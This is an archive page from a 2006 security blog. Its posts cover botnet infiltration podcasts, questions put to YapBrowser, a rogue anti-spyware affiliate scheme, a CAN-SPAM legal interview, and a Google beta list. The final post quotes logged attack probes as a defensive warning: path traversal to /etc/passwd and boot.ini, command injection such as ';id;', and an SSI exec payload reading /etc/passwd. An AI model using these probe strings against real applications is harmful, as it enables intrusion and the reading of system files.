Internet Threats, IM, Malware, P2P, Spyware - Software in a World of Grey.
« March 2006 |
Main
| May 2006 »
- Spyware Warriors and the Digital UnderGround: Part 1 & Part 2
Spyware Warriors and the Digital UnderGround: Part 1& 2 Podcast Segments
Podcast conducted and moderated by Jeff Molander of Thoughtshapers.com
Guests:
Wayne Porter, Sr. Dir. Greynet Networks
Chris Boyd (PaperGhost), Dir. Malware Research
Facetime Communications
Wayne Porter and Chris Boyd (aka PaperGhost) get paid to spend their days infiltrating rings of real life cyber criminals, all the while risking they'll get caught by the thieves themselves. How must it feel to gather evidence on such bottom-feeders and then turn it over to the proper authorities- according to them- it feels great.
Spyware Warriors and the Digital UnderGround: Part 1
Press PLAY button to listen now or download as MP3.
 DOWNLOAD
00:01 - Introduction
02:38 - What does Facetime do and for whom?
04:09 - What is a botnet network? (Boyd)
05:20 - What are hackers and e-criminals motivations? (Boyd)
06:11 - Things changing for the worse; paradigm shift (Porter)
07:55 - The story of RinCe, tipster on major bust (Boyd, Porter)
10:20 - Anatomy of a good tipster; motivations (Boyd)
11:44 - Changing vectors & new dangerous hacker tactics (Porter)
12:54 - Instant Messaging no longer safe (Porter)
13:24 - Botnet criminal motivations (Boyd)
13:44 - New perspectives (Molander)
14:34 - Attack complexity increasing, vectors changing (Porter)
16:24 - Dark Economy: Organized crime moving online (Porter)
16:59 - Cloak & Dagger: How to penetrate a botnet (Boyd)
19:03 - Gathering intelligence from "the underbelly" (Porter)
22:54 - Fallout from adware, spyware & Web crime (Porter)
23:34 - Warning to e-commerce executives (Porter)
Spyware Warriors and the Digital UnderGround: Part 2
Guests:
Wayne Porter, Sr. Dir. Greynet Networks
Chris Boyd (PaperGhost), Dir. Malware Research
Facetime Communications
Molander: In part two, I begin to discuss how and why major name advertisers (and advertising networks they work with) unknowingly get caught funding criminal activity.
Porter goes on to predict that the realm of click fraud is bound to get a lot more ugly as massive, criminal-operated networks of "zombie" PC's ("botnets") turn their guns in a new direction. Detecting them may, as it turns out, not be easy for Google, Yahoo Search, or others
Spyware Warriors and the Digital UnderGround: Part 2
Press PLAY button to listen now or download as MP3.
 DOWNLOAD
0:00 - Introduction
1:02 - How and why would major advertisers fund criminals?
2:04 - The Problem: brokers of ad brokers of ad brokers
2:34 - The connection between performance advertising and botnets, fraud
4:58 - Risk levels of cost per sale vs. cost per click vs. impression/CPM
6:28 - How brands are affected
7:16 - A new form of cost per click fraud?
9:19 - Small but widely distributed click fraud botnets may prove highly problematic
11:30 - Enterprise risks to botnets
11:48 - The potential for a new form of click fraud
13:44 - Web marketing, becoming less efficient and dangerous for brands
14:52 - "Botnets can be used for pay per click fraud" (Porter)
15:10 - Learn from the Past: AllAdvantage "Get Paid to Sleep" (Porter)
17:05 - New SpywareGuide.com blog
19:15 - Funny story: "Mr. Bean" movies among bad guys
21:31 - Closing remarks
So whatever happened to these botnet operators?...stay tuned...something ground-shaking did happen after the first articles and podcasts went to press...
- YAPBrowser- Questions & E-mail Interview
I received confirmation via the "Yap Browser" people who stated they would work on answering questions for next week. The YapBrowser's questions were written in English and then translated into Russian (Thanks Anna and thanks Joe!) and urged to reply in Russian- their native laungage. As soon as I have their answers I will have them translated, once again, by two different teams and post the Russian answer document as well. All will be followed per the rules of engagement.
Wayne Porter's E-mail Interview: Questions to Yap Browser:
1. So that it is clear what is the name of the entity or company that develops and operates YapBrowser?
2. Are YapBrowser and YapSearch.com controlled and / or operated by the same entity or otherwise related?
3. For the purpose of general information background and mutual understanding, can you describe the business that you conduct on the Internet?
4. How long has YapBrowser been available for end-users to download from the Internet?
5. Aside from working with 180solutions can you cite, as trade references, any other businesses or advertisers that you work with, have worked with in the past or those who have expressed interest in working with you in the future?
6. How long has YapBrowser bundled the 180solutions product- Zango?
7. How were you not aware over that period of time that your application / sites were redirecting to the offensive material?
8. How rigorous was 180Solutions / Zango in terms of checking your application
before they agreed to have their software bundled with the YapBrowser application?
9. Did 180solutions test the software prior to your agreement to bundle Zango?
If so, can you describe the process that was involved?
10. Did they test your application after it launched with the
Zango product bundled?
11. Have you received payment from 180Solutions for the
Zango downloads you delivered?
12. Your sites were hosted on a server that also hosted
known hijack sites and sites related to other allegedly illegal practices.
Specific examples would include instme. biz and nstallme. info.
At the time of my testing there were only six other sites residing on this server besides yours,
and approximately 60 + sites on a related IP address. Again, many of which were highly dubious
and well known to the security community.
Given the current state of Russian webmaster forums, where whole sections are
devoted to "rogue" sites and installers, as well as the widespread coverage of these
groups by Western security companies, how is that you were not aware of the
practices of your neighbours on this server?
13. How is it that you were not aware your chosen server host
were well known and documented for hosting such sites and material?
14. To quote from your exchange with Paperghost at VitalSecurity.org:
VitalSecurity.org
Paperghost: The same details are used for a group of sites at Eltel, a Russian ISP,
including one site that redirects the user to browser exploits at paradise-dialer.com,
which load trojans, spyware and dialers. Paradise-dialer's whois places it as part of
the CWS group known as Dimpy, aka BigBuks. Since the BigBuks whois is also given
by mix-click, referred to by the yapbrowser/yapsearch whois, and the aforementioned
servers at Pilosoft and Eltel (as well as the paradise-dialer server also at Pilosoft just a
few IP addresses away) run many other sites that link back to browser exploits and
child porn promotions run by BigBuks, it seems reasonable to assume that they are
the same group of people.
So, is this you or not? And if not, how come the contact details are the same?
YapBrowser: We now try to find people which are involved in
an illegal site. They had some attitude to domain names, but not to our activity. Similar
these people are engaged in distribution illegal content and in parallel contain a server
for this purpose. We have chosen a unsuccessful place of accommodation of the
projects in a network.
Given your statements and acknowledgement of illegal content distribution,
presumably you have accurate details of who you did business with for hosting.
This would include business names, individual names, addresses, phone-numbers, etc.
You appear to claim to have been victimized by a supposedly legitimate business entity,
are you willing to serve the public interest by making this information
available in this interview?
If so, please provide details. If not, why not?
15. It was been brought to my attention that:
A representative of YapBrowser is John Helbert, as seen here:
http://sunbeltblog.blogspot.com/2006/04/yapbrowser-getting-yelled-at.html
A connection has been made between this person and an individual called “Klass” a member of a “Lolita / CP” board called “Dark Master”. (Matching ICQ numbers, etc). More on this connection can be seen here:
Sumbelt Haloscan comments
What is your response to this connection between YapBrowser and the “Dark Master” forums?
16. Ben Edelman provides video evidence of the dubious activities of an outfit
called HighConvert working with a number of adware companies. See video: http://www.benedelman.org/scripts/video/?v=highconvert-081505
this operation appears to be related to a document uncovered and transcribed from Russian
into English by Sunbelt Software in early April. The YapSearch domain is cited in this document.
Reference English translation of document here: Sunbelt Translation Document.
The document outlines plans for “invisible clickers”, lowering of browser’s security settings,
utilizing “Blue Screen of Death” for trick ads, and the changing of 404 error pages among
other dubious practices. How do you explain this reference to YapSearch?
17. Did YapSearch or YapBrowser ever deploy any of the
tactics outlined in this document?
18. Given the current state of affairs what is the future for YapBrowser-
do you still intend to distribute this application?
- Nugache: The Shape of Things to Come in P2P Land
As detailed over at Shadowserver.org, this is a particuarly new and nasty beast. Called "Nugache", it has email capabilities, attacks various vulnerabilities and has crazy leet FTP skills. The FTP powers are lying dormant for the moment, however this will surely change when the all singing and dancing Nugache Mark 2 hits the streets.
Currently, the theory goes that (while spreading via P2P), if the IRC-based Command & Control center is shut down, some nifty P2P coding will "reclaim" the potentially lost bots and start the whole thing up again at a later date. Sounds like there's some messed up coding in this thing at present, so it shouldn't hit too hard for the moment. Just be extra careful in P2P land, because at some point this thing is going to bite down hard.
Good news is, we've detected this thing since early January and enterprise customers are safe. Home users will have to remain vigilant for the time being - but then, if you're using P2P you should be anyway...
- Deception, Deceit and Dollars- Spotting Red Flags
While Googling for downloading Hijackthis, i spotted a link from Google's Adsense program. Check out the following screenshot:
 Click Image to enlarge
(Note the Red X is part of the SiteAdvisor program which can help users spot sites that use deceptive practices and is only displayed if you using the program.)
In above screenshot clicking the link “HijackThis Free download” opens a site http://hijack-thisnet/. Naturally curiosity compelled me to dig deeper into this site and also I wanted to know what Merijn, the original creator of HJT had to about this site? It appears it struck his radar a long time ago and was not pleased the name of his product was being used to push other commercial products.
He states from http://www.merijn.org/
" April 22, 2005:
Just a short note on the domain HIJACK-THIS.NET: this is not mine! It has been registered by an affiliate of XoftSpy (who are also on the Rogue Antispyware List on SpywareWarrior.com) and they are luring people into downloading their software believing it is HijackThis. Also, they have registered a few AdWords at Google leading to the same result. We'll see where this goes. In the meantime, if you want to download any of my programs, the official domain is and always will be www.merijn.org."
UPDATE: April 29, 2005:
I just received word from Paretologic (the ownsers XoftSpy) that the affiliate responsible for the page has been terminated and the site will be taken down. That's one down, one to go. :) "
Let's dig into this mystery...
More Googling about this website gives me the results on series of rogue anti-spywares downloaded from this website via the http://hijackthis.net.RogueAnti-spyware being provided through a third party affiliate aggregator, hop.clickbank.net, known as Clickbank. The Anti-Spyware software in the link changed frequently with what appears to be different anti-spyware products. Google Cached page of the Hijack-this..net page displayed the following:
Hijack-This.net
Your computer may be infected with harmful spyware programs.
These spyware infections can lead to computer crashes, instability, slowness, and full system failure.
Immediate removal may be required.
Please try the following:
* Click here to scan your computer for hidden spyware programs.
* When you see a grey download box like the one shown below, click the Open or Run button to download the free scanner.
* After the download completes, scanner will automatically install and load and show you a list of spyware programs on your machine -- and tell you how to get rid of them.
If you get an error message when trying to download the software -- or the software does not open automatically on your computer after the download completes -- click here for help.
By downloading the free scanner, you agree to the End User License Agreement.
© Copyright 2004-2005, Hijack-This.net All Rights Reserved.
If you were to click "Click Here", it would begin to download the "so-called" anti-spyware “Adware Alert” which was listed as a rogue although the new version of “Adware Alert” was de-listed from the Spywarewarrior Rogue List.
Suzi Turner, of ZDNET, wrote about this web-site sometime back. Apparently this site sold "NoAdware" for a period of time which is also classifed by many as a rogue product. This information can be found from the comments section on spywarewarrior blog entry
Take a note from Castlecops says the "Bad guys" registered this domain to make the user believe this is original HijackThis. This is rather deceptive and a prime example of how rogue affiliates leech on to a popular free program to drive sales programs with big commissions.
Check out the following screenshot for Hijack-This..net web-site:
 Click Image to enlarge
This website appears to actively discouragethe user from downloading HiJackThis by a warning with the following content:
“ HijackThis tool can only be used by advanced users, especially warning the user…
... it can lead to more serious complications on your PC - such as your Internet no longer working or problems with running Windows itself. Use at your own risk."
This is ironic since the original advertisement stated "accept no substitutes" and ad term targeted was hijackthis.
In the above part of the website there is a link to original HijackThis program. If we look at the website, it does not look suspicious. Because this website contains only Plain Text, No pop-ups, No banner ads, coupled with the domain name that mimics someone's else program it is easy to see how the affiliate is causing confusion.
Another notable content from HijackThis..net:
"...SpyOnThis is a powerful alternative to HijackThis for anyone facing problems with Spyware, Adware, and Hijackers on their PC...
...Click here to visit the SpyOnThis homepage and download SpyOnThis free of charge...."
In summary we have an affiliate using a URL that mimics a popular, albeit advanced, helper utility against spyware. However, they claim SpyOnThis is a very good alternative for HiJackThis- especially if you are not an advanced user. “Click here” in the above content links to the page http://www.spyonthis..net/index.html via http://hijackthis.spyonthis.hop.clickbank..net/ link confirming it is going through an affiliate program aggregator called ClickBank. The site looks like the following:
 Click Image to enlarge
Note there is no Privacy Policy on the website. This is an additional "red flag" a user should be aware of.
At this point I decided to take a deep dive and downloaded the software manually and installed on a clean machine using VMWare to ensure system was clean. While installing the software it does display a EULA. You can Download EULA from this link,
SpyOnthisEULA
SpyOnThis looked like this in the following snapshot:
 Click Image to enlarge
Here is where the problems become flagrant. Upon scanning a completely clean machine SpyOnthis detected valid registry keys and cookies as spyware applications such as ClearSearch, Claria, e-Surveiller, Bargain Buddy..etc., Following snaphot shows the detections that SpyonThis returned on a clean machine.
Scan started : 4/24/2006 3:39:19 PM
Total items scanned : 18010
Objects found : 13
Objects ignored : 0
ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\
TRUSTEDPUBLISHER\CTLS
RiskLevel: 4
ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\
TRUSTEDPUBLISHER\CRLS
RiskLevel: 4
Claria object found!!!
Object: Claria
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_USERS:.default\software\microsoft\systemcertificates\trustedpublisher\crls
RiskLevel: 3
Possible Browser Hijack object found!!!
Object: Possible Browser Hijack
Class: REGDATA
Type: HIJACKER
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN[START PAGE="ABOUT:BLANK"]
RiskLevel: 3
e-Surveiller object found!!!
Object: e-Surveiller
Class: REGKEY
Type: KEY LOGGER
FoundIn: HKEY_LOCAL_MACHINE:SOFTWARE\Classes\.zlg
RiskLevel: 6
e-Surveiller object found!!!
Object: e-Surveiller
Class: REGKEY
Type: KEY LOGGER
FoundIn: HKEY_CLASSES_ROOT:.zlg
RiskLevel: 6
Bargain Buddy Bundle object found!!!
Object: Bargain Buddy Bundle
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_LOCAL_MACHINE:SOFTWARE\Microsoft\Code Store Database
RiskLevel: 3
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@2o7[2].txt
RiskLevel: 0
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@cgi-bin[1].txt
RiskLevel: 0
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@mediaplex[1].txt
RiskLevel: 0
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\COPYING
RiskLevel: 3
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\LICENSE
RiskLevel: 3
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\README
RiskLevel: 3
 Click Image to enlarge
Naturally to remove the various registry keys (which are valid keys making them either false positives or possibly intentionally deceptive) it asks the user to register the product in this fashion:
 Click Image to enlarge
If we click 'OK' it redirects to the page where the product can be registered http://www.spyonthis..net/registration.html. It asks for email address and name and clicking the button order redirects to the page where the product can be registered through the ClickBank website. Finishing the process is done by the country name and the postal code Clicking the button "Continue to step 2" opens up a form like the following which is the standard "checkout process" for products sold through the Clickbank network.
 Click Image to enlarge
If we carefully look at the bottom page of the above snapshot which shows affiliate=hijackthis. This is probably an internal tracking mechanism that allows the affiliate to see where the sale is originating from- this is a common form of crude web analytics.
In this scenario several parties benefit from this scheme:
1) Hijack-This.net is the affiliate who will receive a commission for selling the product.
2) ClickBank, the affiliate aggregator, will receive a smaller commission for the sale of this product.
3) SpyonThis, the merchant, will receive monies less the money paid to Hijack-This.net and the fee from Clickbank for facilitating the transaction.
4) Google benefits by charging the affiliate a per-click-fee for the ad
It is also notable, according to SiteAdvisor, that in the past Hijack-this..net was also promoting a program called MySpywareCleaner (well documented at SysInternals.com) which is no longer available for download.
This probably stems from the lawsuit filed against it's owners by the U.S. District Court in Seattle, which accuses New York-based Secure Computer, as well as associates in the United States and India, of marketing software that falsely claims computers were infected with spyware and selling consumers a program that claims to remove it. In fact, the software renders computers more susceptible to attacks. Secure Computer also owned several Web sites, including myspywarecleaner.com, myerrorfixer.com, and checkforspyware.com.
Washington’s new spyware act prohibits inducing a computer user to download software by making any false claims that the software is necessary for security purposes. It further prohibits software from surreptitiously modifying a computer’s security settings. The statute carries a penalty of $100,000 per violation.
If found liable, the defendants can also be fined up to $250 per violation under the federal CAN-SPAM act, $500 per violation under Washington’s spam act, $2,000 per violation under the Consumer Protection Act, as well as other restitution to be determined by the court.
In summary it is important to check out a program's history and look for "Red Flags" in this case they are very evident with a little sleuth work:
- Use of another popular freeware program to lure in new users
- The ad says "Accept No Substitutes" but the page itself is designed and does offer a substitute
- Glaring false positives upon scanning a machine in the VMWare (clean) environment
- Bidding on the term "HiJackThis" and "Hijack This" in order to lure in users by usurping the name of another program
- Language crafted to discourage using HiJackThis if you are not an advanced user or afraid of "taking risks"
- Past affiliation promoting a program that is currently being sued by the U.S. District Court in Seattle for deceptive practices
- Domain ownership is "masked"; it's hidden under the name: Domain Listing Agent (NRPDB)
- No link to any privacy policy on the website
Note: http://www.hijack-this.net/eula.html is active at the moment however there is no link to it on the homepage of the domain. This EULA can be downloaded from the link
HiJackThis EULA
- Facetime Security Lab Researchers Net Two Microsoft MVP Security Awards
I am pleased to announce that two members of the FSL research team received Microsoft Security MVP Awards this year. Namely Wayne Porter, Sr. Director of Greynets Research and Chris Boyd, Director of Malware Research. This is my first time to receive this honor but this is the second year running for the indefatigable Chris Boyd, a.k.a. PaperGhost.
The Microsoft Most Valuable Professional (MVP) Award is an annual award that is given to outstanding members of Microsoft's peer-to-peer communities, and is based on the past year's contributions those members make in those communities online and offline.
You can learn more about the awards at the Microsoft MVP FAQ or check out the official MSFT MVP site.
A little history and color about the awards from Wikipedia:
The Microsoft Most Valuable Professional (MVP) Program is an award and recognition program run by Microsoft. Microsoft MVPs are volunteers who have been awarded for providing technical expertise towards communities supporting Microsoft products or technologies. An MVP is awarded for contributions over the past year.
The MVP program grew out of the developer community: rumor has it the initials stood for "Most Valuable Professional", as the initial MVPs were drawn from the online peer support communities such as Usenet and CompuServe. It has since grown to include other types of products, and other avenues of contribution.
A posting from Tamar Granor on the Universal Thread web site gives this account of the origin of the MVP program.
"Way back in the dark ages, Microsoft provided a great deal of technical support on CompuServe. The CompuServe FoxPro forum was extremely busy and Calvin Hsia, then an independent developer, now Developer Lead on the Fox team, created what we called "Calvin's List." It was a listing of the number of postings by person, including info on both messages sent and received. Being in the top 10 on Calvin's List any month was an accomplishment, though we discussed whether it was a good thing or a bad thing. "
As the story goes, some of the Microsoft people jumped on Calvin's List as a way to identify high contributors, and thus was born the MVP program.
- Spam- Anne Mitchell Clarifies The McCain Amendment
Question? What is the McCain Amendment as it relates to CAN-SPAM?
Level: Advanced
This is a tough one so I tracked down a real expert- Anne Mitchell, Esq., CEO of the Institute for Spam and Internet Public Policy, and a Professor of Law in California for the answer.
This interview is an attempt to try to clarify the news I reported here earlier coming out of TheInternetPatrol.com report on the lawsuit that went all the way up and down the chain.
It wasn't easy catching her as she was busy preparing for a workshop, but I think we have some solid answers for readers. (And thanks Anne for taking the time!) So to recap we're talking about the recent announcement by the Federal Trade Commission and California Attorney General Bill Lockyer that they have settled a lawsuit in which they went after a spammer both for the spam they sent, and for the spam which their affiliates sent. Let's dive in!
Wayne: Anne, the burning question here is how is it possible that they went after the vendor and affiliates as well?
Anne: I'm really glad that you asked that Wayne. When CAN-SPAM was passed, there was a lot of gnashing of teeth and wiping of eyes as people decried it to be the U-CAN-SPAM Act, and said that it was a worse than useless law. Unfortunately, what *nobody* seemed to be aware of - and even though we mentioned it in every press interview the press never picked up on it (perhaps because they didn't realize how big it was) - was this little section of CAN-SPAM which we refer to affectionately as "The McCain Amendment". This section of CAN-SPAM, which I call the "vendor liability" section, basically says that if you stand to benefit from the spam, *even if you don't send* the spam, you are on the hook legally just as much as if you *had* been the one who
pushed 'send'.
Wayne: Good- no more using affiliate mules I hope. So we go to the top of the money chain. OK the ramifications of this are potentially huge. I find it hard to believe most people didn'tknow about this?
Anne: Well, as I said, the press didn't seem to really understand what an incredible tool this was for anti-spam enforcement, and the people who were slamming CAN-SPAM were so upset over it being an opt-out law instead of opt-in law that they weren't really interested in looking for any Easter eggs, so to speak.
Now, I happen to know that Senator McCain's office, as they were contemplating introducing this amendment to the bill which eventually became CAN-SPAM, specifically wanted to take aim at those vendors who either used affiliates to do their spamming, or who turned a blind eye to spamming affiliates.
Wayne: I have seen the myopia some merchants display. But how do you know that for sure?
Anne: Because they called me when they first were contemplating the amendment, and asked me how best they could do that, and in fact I helped to author the McCain amendment.
Wayne: Very cool. Authoring amendents is beyond me- so how does it actually work?
Anne: It's pretty simple. We distinguish between "senders" (those who hit 'send' and inject the spam into the Internet stream) and "vendors" (those whose wares are being advertised in the spam or who otherwise benefit from the spam payload). Now, often the sender and the vendor are one and the same. But often they are two different entities. And in those cases, prior to the McCain amendment, the vendor was able to say "hey, it wasn't me who sent it. You're barking up the wrong tree. Now go away." And that would often be the end of it, primarily because the sender was so well hidden, or when they could be traced they were in another country, beyond U.S. jurisdiction.
Vendor liability addresses all of these problems in one fell swoop. No longer can the vendor who utilizes spam hide behind their affiliates or hired spam guns. And it's easy as anything to find the vendor because hey, they want you to give them money. And in order to give them money, you have to be able to find them. And because you are giving them money, that almost always means that they have a connection - their bank or credit card processor or such - to the United States, even if they themselves are hiding offshore. Which means that jurisdiction is no longer a problem.
Wayne: I always love the money trail. OK so the burning question I am sure on people's mind will be: "What about the legitimate businesses who truly don't knowthat they may have a rogue affiliate, or that the marketing expert they engaged to do their email campaign is actually spamming or using the services of a spammer? It's easy enough to imagine this could hurt legitimate business people who accidentally or innocently fall in with the wrong crowd.
Anne: The standard for nailing someone under the McCain Amendment is that they either knew or should have known that they were benefitting from spamming activity. It's not rocket science. When you are in business, you have to do reasonable due diligence for all sorts of things, and to whom you give your email campaign for sending is no exception.
The exact language from the law is that the vendor:
1) knows, or should have known in the ordinary course of that person's
trade or business, that the goods, products, property, or services
sold, offered for sale, leased or offered for lease, or otherwise made
available through that trade or business were being promoted in such a
message;
(2) received or expected to receive an economic benefit from such
promotion; and
(3) took no reasonable action -
(A) to prevent the transmission; or
(B) to detect the transmission and report it to the Commission.
Wayne: Good! Sounds like this could be the beginning of a real tool for reform.
Anne: Yes, unfortunately, in their infinite wisdom, as the legislature was finalizing CAN-SPAM, they reserved the power to enforce the McCain amendment (which is, by the way, in the actual code is called "SECTION 6. BUSINESSES KNOWINGLY PROMOTED BY ELECTRONIC MAIL WITH FALSE OR MISLEADING TRANSMISSION INFORMATION", or just "Section 6") to just the Federal Trade Commission, meaning that even though state attorneys general and even ISPs are empowered to bring a lawsuit under CAN-SPAM, only the FTC can bring a vendor liability action under Section 6. But, as has been demonstrated by this announcement, states and the FTC are very cooperative in this regard, and if a state attorney general, or even a larger ISP, felt they had a case under Section 6, the FTC would certainly want to hear about it.
Wayne: Anne, this is great stuff. Thank you so much for explaining it to me and the folks here and taking time out of your busy schedule!
Anne: You're welcome!
Author Postscript: I forgot to ask Anne if this applied to SPIM (spam sent through IM) but perhaps when she is done workshopping I can get some more intel. I can also hope this type of bite gets put into something to contain unruly "adware" vendors who continually claim to be "victims".
- Yapbrowser...Not Something You'd Want to Plugin To!
This one has crept across the security pros and analysis can now be found here and here.
For those not in the know, Yapbrowser is a browser "search tool" - unfortunately, none of the paid for links work (returning a blank page) and anything entered into the browser redirects to...illegal pornography. What makes this even more interesting is that you need to install Zango (from 180 Solutions) to run the application.
The response, or perhaps lack of one, from 180 should be interesting, to say the least...I wonder how it will differ from their interview Wayne Porter did with them a year ago.
They said...
First, 180solutions cares a tremendous amount about what users think about our software from how it is distributed to how it works on a user?s machine. As our company has grown, our company has and will continue to invest heavily in user-focused initiatives. Going forward, through the use of additional staff and innovative technology, we will dramatically increase control over how our partners operate. We understand and accept the responsibility to monitor and police our partners.
Historically, 180solutions has not installed software; we relied on a network of partners to distribute our applications. Over the last year, 180solutions has placed greater emphasis on managing distribution partners as well as moving to maintain more control over how our software is installed on users? machines. In response to public and our own concerns, we careful monitor our channels for conduct we find inappropriate. 180solutions has a stringent distributor code of conduct in place and frequently audits distribution partners.
Reference:
Porter's Preface to 180 Solutions Response & Some Software Philosophy.
Official Response from 180solutions to Porter's Questions
- Museum of Modern Betas- Coming Down The Pipe
As a researcher it is critical to look at not what is on the ground but what is coming down the pipe in terms of development ideas.
This site lists all sorts of sites and applications which are in beta and a handy reference for the curious. For the REALLY curious check out the current alpha releases.
Check out the Museum of Modern Betas.
Note that Google has over 70 + Betas !!!
# Selling on Google Base Apr 16
# Google Calendar Apr 13
# Google Related Links Apr 5
# Google Suggest Japan Apr 5
# Google Rooms Apr 1
# Google Romance Apr 1
# Google Circles Mar 31
# Google local business ads Mar 31
# Google! (1998) Mar 30
# Google Finance Mar 21
# Google Safe Browsing for Firefox Mar 17
# Google Blogger Web Comments for Firefox Mar 17
# Google Books Partner Program Mar 14
# Google Nieuws Nederland Mar 14
# Google Catalogs Mar 13
# Google Noticias Venezuela Mar 11
# Google Noticias Peru Mar 11
# Google Noticias Cuba Mar 11
# Google Noticias Colombia Mar 11
# Google News South Africa Mar 11
# Google News Israel Mar 8
# Google AdWords Editor Mar 7
# Google News Taiwan Mar 3
# Google News HongKong Mar 3
# Google News Italia Mar 3
# Google Noticias Espana Mar 3
# Google Ricerca Libri Mar 1
# Google Búsqueda de libros Mar 1
# Google Recherche de livres Mar 1
# Google Buchsuche Mar 1
# Google Brin Creator Feb 28
# Google News Deutschland Feb 28
# Google News Österreich Feb 28
# Google News Japan Feb 28
# Google News China Feb 28
# Google Page Creator Feb 23
# Gmail for your domain Feb 11
# Google Noticias Portugal Jan 27
# Google Noticias Brasil Jan 27
# Map Builder Jan 27
# Google Pack Jan 10
# Google Transit Dec 9
# Google Services Guide Dec 7
# Google Ride Finder Dec 7
# Froogle Merchant Center Dec 7
# Site-Flavored Google Search Dec 7
# Froogle Shopping List Dec 7
# Gtalkr Dec 1
# Google Publication Ads Nov 22
# Google AdSense for Feeds Nov 19
# Google Book Search Nov 17
# Google Base Nov 16
# Google Language Tools Nov 2
# Google Bendi Oct 30
# Google Sitemaps Oct 29
# Google SMS Oct 27
# Google Gulp Oct 25
# Google Site Map Generator Oct 20
# Google Total Oct 15
# Nuah: Google Sitemap Oct 10
# Nuah: Google Pagerank Crawler Oct 10
# Google Reader Oct 7
# Froogle Oct 4
# Google Print Oct 4
# Google Local Oct 3
# Google Alerts Oct 3
# Google Groups Oct 3
# Google Scholar Oct 3
# Google Maps Oct 3
# Google Video Oct 3
# Google Personalized Search Oct 3
# Goggle Suggest Oct 3
# Google Blog Search Oct 2
# Writely Oct 2
# Gmail Oct 1
Also worthy of mention is the Hot 100. The author measures this using "The hottest betas in the webosphere, as measured by the number of bookmarks at del.icio.us added within the last 7 days." Updated each Sunday.
- Dell Decrappifier- From Cluttered to Pristine
It appears this fellow isn't the only one tired of getting lots of "useful addons" on his new PC from Dell. Rather than ship a virgin system, Dell has money making deals to include certain forms of adware or sponsored search engines and they pocket the change.
This, in theory, is ok, depending on what the Dell EULA states, but what about users who do not want all of the extraneous stuff, trial installations and other unwanted programs? This person took matters into his own hands by by creating and running a very simple file.
Enter in the Dell Decrappifier, a script, that hopefully returns your PC back to its pristine state before all the marketing deals take over your coveted resources.
From their website:
It's a sad state of affairs when you buy a new computer these days and it comes pre-loaded with a ton of garbage software that brings your new machine to a crawl. If anyone's bought a Dell PC in the last few years, you probably know what I'm talking about. Just recently, I was helping a friend set up his brand new Inspiron 1300 and it took FOREVER for it to boot up. It's a very dissatifiying experience to pull a brand new computer out of the box and be spammed with a bunch of trial software. After removing all of the crap, (wich took a significant amount of time) it booted much faster and performed like it should. I kept thinking it would be nice to have an automated way to remove all this stuff. Thus was born the Dell De-Crapifier script.
Now, to be fair, I know most all of the major PC manufacturers have similar practices of installing trialware. I would suspect they don't make any profit on the hardware (or even a loss) and they make their money on the kickbacks from the software companies. I don't know.
Anyway, I wrote the Dell De-Crapifier using a great little scripting tool called AutoIT. You can use it to automate pretty much anything in Windows. There is also a cool editor called SciTE that gives you all the tools you need to put together a script. The best thing about this whole system is that you can generate stand alone executables that don't require a runtime.
Visit the Dell Decrappifier to see it in action. Read *carefully* before you download the file and use!
- The Attack on Web Applications- Using Jedi Foresight
Level: Advanced
While conducting log analysis around a new web application we have been developing the ever vigilant Obijan
noticed what appears to be an individual using automated tools to probe the application
in several nefarious ways. We can also assume that they are running the same styles of attack
on all forms sitewide.
For example here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)
The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately all the attacks were unsuccessful, but it is something to always
keep in mind when designing applications. Any application you put online will
be found by spiders and will be hammered at in any way, shape or form possible.
Here is a sample of some of the not so nice "requests" this person
made.
"`id`"
""
"id"
"|id"
"/../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../etc/passwd^^"
"id"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"`"
"/etc/passwd"
"/boot.ini"
"
"
"%00"
"%0a"
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
"/../../../../../../../../bin/id|"
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
"/./././././././././././etc/passwd"
"/..\../..\../..\../..\../..\../..\../etc/passwd"
"/..\../..\../..\../..\../..\../..\../boot.ini"
"/./././././././././././boot.ini"
"/../../../../../../../../*"
","
";"
"\'"
"/'"
"*'"
""
"*"
"/"
""
"<!--#exec cmd=""/bin/cat /etc/passwd""-->"
"
/bin/cat /etc/passwd"
"/../../../../../../../../../../boot.ini"
";id;"
"\\'/bin/cat /etc/passwd\\'"
"`dir`"
"'"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"\..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
